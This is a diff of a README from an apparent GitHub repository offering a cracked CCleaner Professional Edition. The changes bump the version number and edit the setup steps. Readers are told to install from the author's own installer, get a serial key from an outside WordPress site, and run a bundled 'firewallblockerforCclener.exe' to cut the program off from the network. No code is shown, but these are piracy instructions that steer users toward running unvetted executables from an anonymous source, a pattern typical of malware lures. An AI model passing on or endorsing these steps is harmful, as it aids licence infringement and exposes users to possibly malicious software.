90renrocraftcracksblogspotcom/ccleanerfree/README.md

-## IMPORTANT BEFORE INSTALLATION !!!
+# IMPORTANT BEFORE INSTALLATION !!!
-Secret Portable Edition has been released too press +1 release to find it

-1.Install the 6.26 version from my installer but not launch it.
+1.Install the 6.35 version from my installer but not launch it.

-2. For the serial key you need to go to this website : https://10files.wordpress.com/2024/09/02/ccleaner-6-27-full-professional-edition/

- Download from releases section or : https://github.com/90renrocraftcracksblogspotcom/ccleanerfree/releases/tag/CCleaner
-#1.
-You need to block the app from firewall by going to the folder extracted from installer and run firewallblockerforCclener.exe and don't open it again
-##Free CCleaner 6.27 For 2024 2nd September Professional Edition Only

 2. Open Your CCleaner installed location (Default is - C:/ProgramFiles/CCleaner)